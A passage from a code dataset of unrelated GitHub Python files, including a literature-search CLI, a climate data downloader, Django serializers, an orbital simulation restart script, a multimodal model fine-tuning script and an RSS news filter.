args.source_ieee:\n\t\tieee_api_key = os.getenv('IEE_API_KEY')\n\t\tif not ieee_api_key:\n\t\t\tlogger.critical(\"Application is missing IEEE API key\")\n\t\t\treturn\n\t\tengine.sources.append(IEEESearch(api_key=ieee_api_key))\n\tif args.source_acm:\n\t\tengine.sources.append(ACMSearch())\n\n\tfor term in args.term or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Term, value=term))\n\tfor author in args.author or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Author, value=author))\n\tfor title in args.title or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Title, value=title))\n\n\treturn engine\n\n\nasync def main():\n\targs = parse_args()\n\tload_dotenv(dotenv_path=args.env_file_name)\n\n\tlogger = logging.getLogger(\"systematic_review\")\n\thandler = logging.StreamHandler()\n\thandler.setLevel(args.log_level)\n\thandler.setFormatter(logging.Formatter(args.log_format))\n\tlogger.addHandler(handler)\n\n\tengine = build_search_engine(logger, args)\n\tif not engine:\n\t\treturn -1\n\n\tawait engine.run()\n\tawait generate_output(args, engine, logger)\n\n\tif args.compact_cache_file:\n\t\tlogger.info(f\"Compressing {args.cache_file_name} into {args.compact_cache_file}\")\n\t\tcache = SearchCache.load(args.cache_file_name, compress=False)\n\t\tcache.dump(args.compact_cache_file, compress=True)\n\n\tif args.recover_compact_cache_file:\n\t\tlogger.info(f\"Decompressing {args.recover_compact_cache_file} into {args.cache_file_name}\")\n\t\tcache = SearchCache.load(args.recover_compact_cache_file, compress=True)\n\t\tcache.dump(args.cache_file_name, compress=False)\n\n\treturn 0\n\n\nasync def generate_output(args, engine: SearchEngine, logger: logging.Logger):\n\tif args.list_articles:\n\t\tfor article in engine.found_articles():\n\t\t\tarticle_simple_print(logger, article)\n\tlogger.info(f\"Found {len(engine.found_titles)} articles\")\n\n\tif args.cache_list:\n\t\tcount_unique = 0\n\t\tfor article in engine.cache.unique_articles():\n\t\t\tcount_unique += 1\n\t\t\tarticle_simple_print(logger, article)\n\t\tlogger.info(f\"{count_unique} unique articles in the cache\")\n\tlogger.info(f\"{len(engine.cache)} articles in the cache\")\n\n\texporters = [\n\t\t(args.export_csv, CSVExporter(';'))\n\t]\n\tfor file_name, exporter in exporters:\n\t\tif file_name:\n\t\t\twith open(file_name, 'x') as export_csv:\n\t\t\t\t# TODO test exporter\n\t\t\t\tawait exporter.write(export_csv, engine.cache.unique_articles())\n\t\t\t\t# async for it in exporter.prefix():\n\t\t\t\t# \texport_csv.write(it)\n\t\t\t\t# for article in engine.cache.unique_articles():\n\t\t\t\t# \tasync for it in exporter.content(article):\n\t\t\t\t# \t\texport_csv.write(it)\n\t\t\t\t# async for it in exporter.suffix():\n\t\t\t\t# \texport_csv.write(it)\n\n\tif args.cache_searches:\n\t\tlogger.info(f\"Searches:\")\n\t\tfor search in engine.cache.search_requests():\n\t\t\tlogger.info(f\"{search.token}: {search.value}\")\n\n\tif args.cache_sources:\n\t\tlogger.info(f\"Sources:\")\n\t\tfor source in engine.cache.sources():\n\t\t\tlogger.info(f\"{source}\")\n\n\nif __name__ == '__main__':\n\tloop = asyncio.get_event_loop()\n\tasyncio.set_event_loop(loop)\n\n\tloop.run_until_complete(main())\n","repo_name":"rodoufu/systematic-review","sub_path":"systematic-review/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1388190062","text":"seq = input(\"Digite 5 numeros separados por virgula: \")\nlistSeq = seq.split(\",\")\nlistSeq = [float(i) for i in listSeq]\nsize = len(listSeq)\n\nif size>5 or size<5:\n\n print(\"é indicado que você digite 5 numeros\")\n\nelse: \n sum = 0\n for i in listSeq:\n sum += i\n average = sum/5\n print(\"A soma dos numeros digitados eh {} e a média é: {}\".format(sum, average))\n\n","repo_name":"vianaclaus/Python-","sub_path":"entregar/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33085700084","text":"import os;\nfrom datetime import datetime, timedelta;\n\nfrom ...utils.dateutils import next_month\n\nfrom ..utils.send_email import send_email;\nfrom ..utils.compress_netcdf_file import compress_netcdf_file;\n\nfrom .ERAI_Downloader import ERAI_Downloader\n\nENDDATE = datetime(2019, 8, 1, 0)\n\nclass ERAI_General( ERAI_Downloader ):\n def __init__(self, outdir, info = None, subject = None):\n\n if info is None: info = INFO.copy()\n\n super().__init__( verbose=True, netcdf=True, **info )\n\n self.subject = subject\n self.outdir = outdir\n\n def download(self, start_year = None, start_month = None, email = None, delay = None):\n '''\n Purpose:\n A function to download all ERA-I analysis variables at surface.\n Inputs:\n dir : Directory to save data to\n Keywords\n start_year : Year to start looking for data\n start_month : Month to start looking for data\n email : email address to send error messages to\n delay : Delay from current date to download until. Must be\n a timedelta object. Default is to stop downloading\n data when the month and year are within 26 weeks of\n program start date\n '''\n if start_year is None: start_year = 1979;\n if start_month is None: start_month = 1;\n if delay is None: delay = timedelta(weeks = 26);\n date = datetime(start_year, start_month, 1)\n\n while date <= ENDDATE:\n self.set_date( date )\n target = self.defaultTarget()\n if not target:\n print('Issue getting target name')\n return\n self.info['target'] = os.path.join( self.outdir, target )\n\n fmt = ' {:2d}: {:40}' # Format for status messages in log file\n self.log.info('Downloading: '+self.info['target']) # Print a message\n\n attempt, max_attempt = 0, 5; # Set attempt and maximum attempt for downloading and compressing\n while attempt < max_attempt: # Try three times to download and compress the file\n super().download() # Download the data\n if self.status < 2: # If the status returned by the download is less than 2, then the file downloaded and needs compressed\n self.log.info( fmt.format(attempt+1,\"Downloaded!\") ) # Print a message\n self.log.info( fmt.format(attempt+1,\"Compressing file...\") ) # Print a message\n status = compress_netcdf_file(self.info['target'], email=email, gzip=5, delete=True);# Compress the file\n if status == 0:\n attempt = max_attempt+1; # Set attempt to four (4)\n self.log.info( fmt.format(attempt+1,\"Compressed!\") ); # Print a message\n else: # If the return status of the compression failed, then delete the downloaded file, increment the attempt counter and try to download/compress again\n attempt += 1; # Increment the attempt\n if status == 1 : \n msg = \"Output file exists and clobber was not set\"; # Set the message for status 1\n elif status == 2:\n msg = \"Data was NOT written correctly after three (3) attempts\"; # Set the message for status 2\n elif status == 3:\n msg = \"There was an error reading the data\"; # Set the message for status 3\n elif status == 4:\n msg = \"Input file doesn't exist\"; # Set the message for status 4\n self.log.info( fmt.format(attempt+1, msg) )\n if os.path.exists( self.info['target'] ): \n os.remove( self.info['target'] ); # IF the download file exists, delete it\n elif self.status == 2: # If the return status of the download is 2, then the compressed file already exists\n self.log.info( fmt.format(attempt+1,\"Compressed file already exists!\") ) # Print a message\n attempt = max_attempt+1; # Set attempt to four\n else:\n if os.path.exists( self.info['target'] ):\n os.remove( self.info['target'] ); # If any other number was returned, delete the downloaded file IF it exists\n attempt += 1; # Increment the attempt\n if attempt == max_attempt: # If attempt is equal to three (3), then the file failed to download/compress three times and the program halts\n self.log.error( fmt.format(attempt+1,\"Reached maximum attempts\") ) # Print a message\n if email is not None: status = send_email(email, subject); # Send an email that the download failed\n return 1; # Exit status one (1)\n\n date = next_month(date)\n return 0;\n\nif __name__ == \"__main__\":\n import argparse; # Import library for parsing\n parser = argparse.ArgumentParser(description=\"ERA-Interim Analisys Pressure Levels Download\"); # Set the description of the script to be printed in the help doc, i.e., ./script -h\n ### Data storage keywords; https://software.ecmwf.int/wiki/display/UDOC/Data+storage+keywords\n parser.add_argument(\"outdir\", type=str, help=\"Top level directory for output\")\n parser.add_argument(\"-y\", \"--year\", type=int, help=\"specifies start year\")\n parser.add_argument(\"-m\", \"--month\", type=int, help=\"specifies start month\")\n parser.add_argument(\"-e\", \"--email\", type=str, help=\"email address to send failed message to\")\n \n args = parser.parse_args()\n inst = ERAI_AN_SFC(args.outdir)\n status = inst.download( args.year, args.month, args.email );\n exit(status); # Exit status zero (0) on end\n","repo_name":"kwodzicki/Data_Downloading","sub_path":"data_downloading/ECMWF/ERAI/ERAI_General.py","file_name":"ERAI_General.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73298012731","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom scheduler.models import *\nimport time\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = User\n fields = ('id', 'url', 'username', 'email', 'first_name', 'last_name', 'is_superuser')\n\nclass VertexSerializer(serializers.HyperlinkedModelSerializer):\n active = serializers.SerializerMethodField(method_name='is_active')\n\n def is_active(self, vert):\n active_seconds = 15\n return (time.time() - active_seconds) <= vert.last_seen\n\n class Meta:\n model = Vertex\n fields = ('id', 'url', 'label', 'address', 'enabled', 'last_seen', 'active')\n\nclass EventRequestSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = EventRequest\n fields = ('id', 'url', 'requester', 'vertex_target', 'timestamp', 'json_text')\n","repo_name":"aoswalt/greenlite","sub_path":"server/scheduler/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74545181370","text":"#!/usr/bin/env python \n# script to continue a mercury simulation assuming that a new folder with all the files of the previous \n#simulations has been created and that we are in this directory \n# Version 1.0\n\nimport os\nimport subprocess\nimport mercury\n\ndef lancer_commande(commande):\n \"\"\"lance une commande qui sera typiquement soit une liste, soit une \n commande seule. La fonction renvoit un tuple avec la sortie, \n l'erreur et le code de retour\"\"\"\n if (type(commande)==list):\n process = subprocess.Popen(commande, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n elif (type(commande)==str):\n process = subprocess.Popen(commande, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n else:\n raise TypeError(\"La commande n'est ni une liste, ni une chaine de caractere.\")\n (process_stdout, process_stderr) = process.communicate()\n returncode = process.poll()\n return (process_stdout, process_stderr, returncode)\n \n# First, we need to get the dump files \nfiles_to_move = [\"param\", \"big\"]\n\nif os.path.exists(\"small.dmp\"):\n files_to_move.append(\"small\")\n\nfor filename in files_to_move:\n lancer_commande(\"mv \"+filename+\".dmp \"+filename+\".in\")\n\n# We delete output files\nlancer_commande(\"rm *.aei *.clo *.out\")\n\n# We delete temporary files (since the ones we were interested in were moved to *.in)\nlancer_commande(\"rm *.tmp *.dmp\")\n\nparamin = mercury.Param('', '', '', '', '')\nparamin.read()\n\nintegration_time = raw_input(\"For how many time do you want to launch the integration (in years)?\\n\")# In years\n\nparamin.stop_time = paramin.start_time + float(integration_time) * 365.25 # in days\n\nparamin.write()\n","repo_name":"EmelineBolmont/mercury-90","sub_path":"analysis/mercury-continue.py","file_name":"mercury-continue.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"2175431877","text":"from dist_system.protocol.base_protocol import BaseProtocol\nfrom dist_system.protocol.pb import slave_worker_pb2 as sw_proto\n\nmessage_table = {\n 'task_register_cmd': {\n 'this': sw_proto.TaskRegisterCMD,\n 'result_receiver_address': sw_proto.TaskRegisterCMD.ResultReceiverAddress,\n 'task': {\n 'sleep_task': sw_proto.TaskRegisterCMD.SleepTask,\n 'data_processing_task': sw_proto.TaskRegisterCMD.DataProcessingTask,\n 'tensorflow_train_task': sw_proto.TaskRegisterCMD.TensorflowTrainTask,\n 'tensorflow_test_task': sw_proto.TaskRegisterCMD.TensorflowTestTask,\n },\n 'slave_address': sw_proto.TaskRegisterCMD.SlaveAddress,\n 'cloud_dfs_address': sw_proto.TaskRegisterCMD.CloudDFSAddress,\n },\n 'worker_register_req': {\n 'this': sw_proto.WorkerRegisterRequest,\n },\n 'worker_register_res': {\n 'this': sw_proto.WorkerRegisterResponse,\n },\n 'task_cancel_req': {\n 'this': sw_proto.TaskCancelRequest,\n },\n 'task_cancel_res': {\n 'this': sw_proto.TaskCancelResponse,\n },\n 'task_finish_req': {\n 'this': sw_proto.TaskFinishRequest,\n },\n 'task_finish_res': {\n 'this': sw_proto.TaskFinishResponse,\n },\n}\n\nprotocol = BaseProtocol(sw_proto, message_table)\n\n\n# input : string, dict\n# output : bytes\ndef make_msg_data(header, body):\n return protocol.make_msg_data(header, body)\n\n\n# input : bytes\n# output : (string, dict)\ndef parse_msg_data(msg_data):\n return protocol.parse_msg_data(msg_data)\n","repo_name":"DrawML/dist-task","sub_path":"src/dist_system/protocol/slave_worker.py","file_name":"slave_worker.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"73293017531","text":"\"\"\"\n Exercício 09\n\n Crie um programa que receba uma lista de nomes de arquivo os imprima, um por um.\n\"\"\"\n\nwhile True:\n arquivo = input('Nome do arquivo: ')\n\n if arquivo == '':\n print('Programa finalizado')\n break\n else:\n with open(f'{arquivo}.txt') as arq:\n for c in arq:\n print(c)\n","repo_name":"fabriciovale20/Livro-Introducao-a-Python3","sub_path":"Capítulo 9 (Arquivos)/ex009.py","file_name":"ex009.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70993885371","text":"# -*- coding: utf-8 -*-\n# @Author: watcher\n# @Created Time: 2023/7/5 3:30 PM\n# @File: finetune\n# @Email: mlshenkai@163.com\nfrom pyrootutils import pyrootutils\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,7\"\nimport sys\nimport wandb\nimport torch\n# import torch.multiprocessing as mp\nimport pathlib\n# from loguru import logger\nimport typing\nimport deepspeed\n\nfrom src.LMBuilder.MLLM.shikra.utils.check_dataset import check_data\nfrom src.test.clip_model_test import test_clip_version\n\nproject_path = pyrootutils.setup_root(\n __file__, project_root_env_var=True, dotenv=True, pythonpath=True, cwd=False\n)\nfrom loguru import logger\nfrom src.LMBuilder.MLLM.shikra.configs.config import prepare_args\nfrom src.LMBuilder.MLLM.shikra.builder import load_pretrained\nfrom src.LMBuilder.MLLM.shikra.utils import print_trainable_params\nfrom src.LMBuilder.MLLM.shikra.data_build import prepare_data, prepare_target_processor\nfrom src.LMBuilder.MLLM.shikra.engine import prepare_trainer_collator\nfrom transformers.deepspeed import HfDeepSpeedConfig\n\ndef main(arg=None):\n cfg, training_args = prepare_args()\n # dschf = HfDeepSpeedConfig(training_args.deepspeed)\n # training_args.overwrite_output_dir = True\n model, preprocessor = load_pretrained(cfg.model_args, training_args)\n # Some ugly codes to inject target_processor into preprocessor.\n # maybe effect model. (e.g. add special token; resize embedding)\n model, preprocessor = prepare_target_processor(model, preprocessor, cfg.model_args, training_args)\n print_trainable_params(model)\n\n # Prepare data_collator\n collator_kwargs = cfg.data_args.collator_kwargs\n trainer_cls, data_collator_dict = prepare_trainer_collator(cfg.model_args, preprocessor, collator_kwargs)\n dataset, compute_metrics = prepare_data(cfg.data_args, cfg.model_args, training_args, preprocessor)\n # test_clip_version(preprocessor[\"image\"], model.model.vision_tower[0])\n\n\n # check_data(dataset[\"train\"], data_collator_dict['train_collator'])\n # Initialize Trainer\n\n trainer = trainer_cls(\n model=model,\n args=training_args,\n tokenizer=preprocessor['text'],\n train_dataset=dataset['train'] if training_args.do_train else None,\n eval_dataset=dataset['validation'] if training_args.do_eval else None,\n compute_metrics=compute_metrics if training_args.predict_with_generate else None,\n **data_collator_dict,\n )\n\n # Training\n if training_args.do_train:\n try:\n if (not training_args.overwrite_output_dir) and list(pathlib.Path(training_args.output_dir).glob(\"checkpoint-*\")):\n train_result = trainer.train(resume_from_checkpoint=True)\n else:\n train_result = trainer.train()\n trainer.log_metrics(\"train\", train_result.metrics) # noqa\n trainer.save_metrics(\"train\", train_result.metrics) # noqa\n trainer.save_model()\n except RuntimeError as e:\n print(f\"got RuntimeError: {e.args}\")\n try:\n print(f\"#### device {training_args.local_rank} summary ####\\n{torch.cuda.memory_summary(training_args.local_rank)}\")\n except Exception as inner_e:\n print(f\"get Exception when show cuda summary: {inner_e.args}\")\n raise e\n finally:\n trainer.save_state() # noqa\n trainer.plot_loss()\n\n # save cfg to output_dir\n try:\n output_dir = training_args.output_dir\n pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)\n cfg.dump(os.path.join(output_dir, \"cfg.py\"))\n except Exception as e:\n logger.warning(f'try to save cfg to output_dir, but get exception {e.args}')\n\n # Keyword arguments for `model.generate`\n gen_kwargs = dict(cfg.data_args.gen_kwargs)\n gen_kwargs.setdefault('use_cache', True)\n # important for use model.generate in batch mode. some model config with wrong special_token_id\n # (e.g. shikra generationConfig set pad_token_id to -1)\n if hasattr(cfg.model_args, 'gen_kwargs_set_pad_token_id') and cfg.model_args.gen_kwargs_set_pad_token_id:\n gen_kwargs['pad_token_id'] = preprocessor['text'].pad_token_id\n if hasattr(cfg.model_args, 'gen_kwargs_set_bos_token_id') and cfg.model_args.gen_kwargs_set_bos_token_id:\n gen_kwargs['bos_token_id'] = preprocessor['text'].bos_token_id\n if hasattr(cfg.model_args, 'gen_kwargs_set_eos_token_id') and cfg.model_args.gen_kwargs_set_eos_token_id:\n gen_kwargs['eos_token_id'] = preprocessor['text'].eos_token_id\n\n # Evaluation\n if training_args.do_eval:\n if hasattr(trainer, '_test_collator') and hasattr(trainer, '_eval_collator') \\\n and trainer._test_collator != trainer._eval_collator: # noqa\n logger.warning('[WARNING!!!] use different collator for eval and test. but do_eval and '\n 'do_predict both use trainer.predict (i.e. only test_collator is used.)')\n eval_results = trainer.predict(dataset['validation'], metric_key_prefix=\"eval\", **gen_kwargs)\n trainer.log_metrics(\"eval\", eval_results.metrics) # noqa\n trainer.save_metrics(\"eval\", eval_results.metrics) # noqa\n trainer.save_prediction(eval_results, file_key_prefix='eval')\n\n # Predict\n if training_args.do_predict:\n predict_results = trainer.predict(dataset['test'], metric_key_prefix=\"test\", **gen_kwargs)\n trainer.log_metrics(\"test\", predict_results.metrics) # noqa\n trainer.save_metrics(\"test\", predict_results.metrics) # noqa\n trainer.save_prediction(predict_results, file_key_prefix='test')\n\n # Multi Predict\n if training_args.do_multi_predict:\n old_compute_metrics = trainer.compute_metrics\n multitest = dataset['multitest']\n multitest = typing.cast(dict, multitest)\n for _idx, (k, item) in enumerate(multitest.items()):\n print(f'processing multitest set {_idx}/{len(multitest)}: {k}')\n _ds = item['dataset']\n _compute_metrics = item['compute_metric']\n _prefix = f\"multitest_{k}\"\n\n trainer.compute_metrics = _compute_metrics\n _pred_results = trainer.predict(_ds, metric_key_prefix=_prefix, **gen_kwargs)\n trainer.log_metrics(_prefix, _pred_results.metrics) # noqa\n trainer.save_metrics(_prefix, _pred_results.metrics) # noqa\n trainer.save_prediction(_pred_results, file_key_prefix=_prefix)\n trainer.compute_metrics = old_compute_metrics\n\n\n# noinspection PyUnusedLocal\ndef _mp_fn(index):\n # For xla_spawn (TPUs)\n main()\n\n\nif __name__ == \"__main__\":\n wandb.init(project=\"llava\", group=\"llava\")\n # import torch.multiprocessing as mp\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n # mp.spawn(main, args=(), nprocs=3)\n main()\n wandb.finish()\n\n\n","repo_name":"mlshenkai/LMPromptBuilder","sub_path":"src/LMBuilder/MLLM/shikra/pipeline/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":6844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1661499374","text":"# 6.0001/6.00 Problem Set 5 - RSS Feed Filter\n# Name: Aena Teodocio\n# Collaborators:\n# Time: Around 5 hours maybe. \n\nimport feedparser\nimport string\nimport time\nimport threading\nfrom project_util import translate_html\nfrom mtTkinter import *\nfrom datetime import datetime\nimport pytz\n\npunc = string.punctuation\n\n#-----------------------------------------------------------------------\n\n#======================\n# Code for retrieving and parsing\n# Google and Yahoo News feeds\n# Do not change this code\n#======================\n\ndef process(url):\n \"\"\"\n Fetches news items from the rss url and parses them.\n Returns a list of NewsStory-s.\n \"\"\"\n feed = feedparser.parse(url)\n entries = feed.entries\n ret = []\n for entry in entries:\n guid = entry.guid\n title = translate_html(entry.title)\n link = entry.link\n description = translate_html(entry.description)\n pubdate = translate_html(entry.published)\n\n try:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %Z\")\n pubdate.replace(tzinfo=pytz.timezone(\"GMT\"))\n # pubdate = pubdate.astimezone(pytz.timezone('EST'))\n # pubdate.replace(tzinfo=None)\n except ValueError:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %z\")\n\n newsStory = NewsStory(guid, title, description, link, pubdate)\n ret.append(newsStory)\n return ret\n\n#======================\n# Data structure design\n#======================\n\nclass NewsStory(object):\n def __init__(self, guid, title, description, link, pubdate):\n \"\"\"\n Initializes a NewsStory object.\n\n Contains the following attributes:\n self.guid (str): A globally unique identifier for this news story.\n self.title (str): The new story's headline.\n self.description (str): A paragraph or so summarizing the news story.\n self.link (str): A link to a website with the entire story.\n self.pubdate (datetime): Date the news was published.\n \n \"\"\"\n self.guid = guid\n self.title = title\n self.description = description\n self.link = link\n self.pubdate = pubdate\n\n def get_guid(self):\n \"\"\"\n Returns: self.guid\n \"\"\"\n return self.guid\n\n def get_title(self):\n \"\"\"\n Returns: self.title \n \"\"\"\n return self.title\n\n def get_description(self):\n \"\"\"\n Returns: self.description \n \"\"\"\n return self.description\n\n def get_link(self):\n \"\"\"\n Returns: self.link \n \"\"\"\n return self.link\n\n def get_pubdate(self):\n \"\"\"\n Returns: self.pubdate\n \"\"\"\n return self.pubdate\n \n#======================\n# Triggers\n#======================\n\nclass Trigger(object):\n def evaluate(self, story):\n \"\"\"\n Returns True if an alert should be generated\n for the given news item, or False otherwise.\n \"\"\"\n # DO NOT CHANGE THIS!\n raise NotImplementedError\n \n\n# PHRASE TRIGGERS\n\nclass PhraseTrigger(Trigger):\n def __init__(self, phrase):\n \"\"\"\n Initializes a new PhraseTrigger.\n \n phrase (str): A phrase to be used as a news story trigger. \n Each word must be separated by a space.\n \"\"\"\n self.phrase = phrase\n\n \n def is_phrase_in(self, text):\n \"\"\"\n Returns True if the whole phrase is in text. False otherwise.\n\n text (str): the text from which to search the phrase trigger from.\n \"\"\"\n phrase = self.phrase.lower()\n mytext = text.lower()\n split_phrase = self.phrase.split() \n\n if len(split_phrase) > 1 and \" \" not in text:\n if text.isalpha():\n return False\n else:\n for i in mytext:\n if i in punc:\n mytext = mytext.replace(i, \" \")\n mytext = ' '.join(mytext.split())\n return mytext == phrase\n\n else:\n text_stripped = mytext.translate(str.maketrans('', '', punc)).split()\n for i in range(len(text_stripped)-len(split_phrase)+1):\n try_text = ' '.join(text_stripped[i:i+len(split_phrase)])\n if try_text == phrase:\n return True\n return False\n\n\nclass TitleTrigger(PhraseTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the phrase is in the story's title. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\"\n return self.is_phrase_in(story.get_title())\n \n\nclass DescriptionTrigger(PhraseTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the phrase is in the story's description. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\"\n return self.is_phrase_in(story.get_description())\n\n\n# TIME TRIGGERS\n\nclass TimeTrigger(Trigger):\n def __init__(self, time):\n \"\"\"\n Initializes a new TimeTrigger.\n \n time (str): A time to be used as a time trigger. \n Timezone is EST and is in format of \"%d %b %Y %H:%M:%S\". \n Example -> \"3 Oct 2016 17:00:10\"\n \"\"\"\n self.tz = pytz.timezone('US/Eastern')\n converted_time = datetime.strptime(time, \"%d %b %Y %H:%M:%S\")\n converted_time = datetime.replace(converted_time, tzinfo=self.tz)\n self.time = converted_time\n\n\nclass BeforeTrigger(TimeTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the story was published before the given time trigger. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n story_time = datetime.replace(story.get_pubdate(), tzinfo=self.tz)\n return story_time < self.time\n\nclass AfterTrigger(TimeTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the story was published after the given time trigger. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n story_time = datetime.replace(story.get_pubdate(), tzinfo=self.tz)\n return story_time > self.time\n\n\n# COMPOSITE TRIGGERS\n\nclass NotTrigger(Trigger):\n def __init__(self, t):\n \"\"\"\n Initializes a new NotTrigger. \n \n t : An instance of a Trigger object.\n \"\"\"\n self.t = t\n \n def evaluate(self, story):\n \"\"\"\n Returns the inverted boolean result from the given Trigger.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return not self.t.evaluate(story)\n\n\nclass OrTrigger(Trigger):\n def __init__(self, t1, t2):\n \"\"\"\n Initializes a new OrTrigger. \n \n t1, t2 : Two unique instances of a Trigger object.\n \"\"\" \n self.t1 = t1\n self.t2 = t2\n \n def evaluate(self, story):\n \"\"\"\n Returns True if one (or both) of the result from the given triggers is True.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return self.t1.evaluate(story) or self.t2.evaluate(story)\n\n\nclass AndTrigger(Trigger):\n def __init__(self, t1, t2):\n \"\"\"\n Initializes a new AndTrigger. \n \n t1, t2 : Two unique instances of a Trigger object.\n \"\"\" \n self.t1 = t1\n self.t2 = t2\n \n def evaluate(self, story):\n \"\"\"\n Returns True only if both of the results from the given triggers are True.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return self.t1.evaluate(story) and self.t2.evaluate(story)\n\n\n#======================\n# Filtering\n#======================\n\n\ndef filter_stories(stories, triggerlist):\n \"\"\"\n Takes in a list of NewsStory instances.\n\n Returns: a list of only the stories for which a trigger in triggerlist fires.\n \"\"\"\n filtered_stories = []\n for s in stories:\n for trigger in triggerlist:\n if trigger.evaluate(s) == True:\n filtered_stories.append(s)\n return filtered_stories\n\n\n\n#======================\n# User-Specified Triggers\n#======================\n\ndef read_trigger_config(filename):\n \"\"\"\n filename: the name of a trigger configuration file\n\n Returns: a list of trigger objects specified by the trigger configuration\n file.\n \"\"\"\n\n trigger_file = open(filename, 'r')\n lines = []\n for line in trigger_file:\n line = line.rstrip()\n if not (len(line) == 0 or line.startswith('//')):\n lines.append(line)\n\n\n # line is the list of lines that you need to parse and for which you need\n # to build triggers\n \n trig_type = {'TITLE': TitleTrigger, 'DESCRIPTION': DescriptionTrigger,\n 'AFTER': AfterTrigger, 'BEFORE': BeforeTrigger, 'NOT': NotTrigger, 'AND': AndTrigger,\n 'OR': OrTrigger} # dict that maps trigger keywords and corresponding classes\n \n user_trig = {} # user defined trigger dict\n added_trig = [] # trigger list \n\n for i in lines:\n i = i.split(',') # split into list to access indices\n\n if i[1] == 'AND' or i[1] == 'OR': # if current line is defining AND / OR trigger\n user_trig[i[0]] = trig_type[i[1]](user_trig[i[2]], user_trig[i[3]])\n\n\n elif i[0] != 'ADD': # if current line is defining a trigger besides AND / OR \n user_trig[i[0]] = trig_type[i[1]](i[2])\n\n else: # otherwise get the previously defined triggers and add them to trigger list\n for trig in i[1:]:\n added_trig.append(user_trig[trig])\n\n return added_trig\n\n\nSLEEPTIME = 120 #seconds -- how often we poll\n\ndef main_thread(master):\n try:\n triggerlist = read_trigger_config('triggers.txt')\n \n # HELPER CODE - you don't need to understand this!\n # Draws the popup window that displays the filtered stories\n # Retrieves and filters the stories from the RSS feeds\n frame = Frame(master)\n frame.pack(side=BOTTOM)\n scrollbar = Scrollbar(master)\n scrollbar.pack(side=RIGHT,fill=Y)\n\n t = \"Google Top News\"\n title = StringVar()\n title.set(t)\n ttl = Label(master, textvariable=title, font=(\"Helvetica\", 18))\n ttl.pack(side=TOP)\n cont = Text(master, font=(\"Helvetica\",14), yscrollcommand=scrollbar.set)\n cont.pack(side=BOTTOM)\n cont.tag_config(\"title\", justify='center')\n button = Button(frame, text=\"Exit\", command=root.destroy)\n button.pack(side=BOTTOM)\n guidShown = []\n def get_cont(newstory):\n if newstory.get_guid() not in guidShown:\n cont.insert(END, newstory.get_title()+\"\\n\", \"title\")\n cont.insert(END, \"\\n---------------------------------------------------------------\\n\", \"title\")\n cont.insert(END, newstory.get_description())\n cont.insert(END, \"\\n*********************************************************************\\n\", \"title\")\n guidShown.append(newstory.get_guid())\n\n while True:\n\n print(\"Polling . . .\", end=' ')\n # Get stories from Google's Top Stories RSS news feed\n stories = process(\"http://news.google.com/news?output=rss\")\n\n # Get stories from Yahoo's Top Stories RSS news feed\n # stories.extend(process(\"http://news.yahoo.com/rss/topstories\")) \n # Uncommented the above due to error from getting description items in Yahoo.\n\n stories = filter_stories(stories, triggerlist)\n\n list(map(get_cont, stories))\n scrollbar.config(command=cont.yview)\n\n\n print(\"Sleeping...\")\n time.sleep(SLEEPTIME)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Some RSS parser\")\n t = threading.Thread(target=main_thread, args=(root,))\n t.start()\n root.mainloop()\n\n","repo_name":"ateodocio/Google-News-RSS-Feed-Filter","sub_path":"ps5.py","file_name":"ps5.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"38171118252","text":"# Main.py - Handles the functionality to the gui and grabbing the information nessasary to display the gui fully and correctly\n\nimport sys\nimport random \nimport os\nimport pygame\nimport numpy \n\nfrom pygame import mixer\nfrom mutagen.mp3 import MP3\n\nfrom PyQt5 import QtCore\nfrom 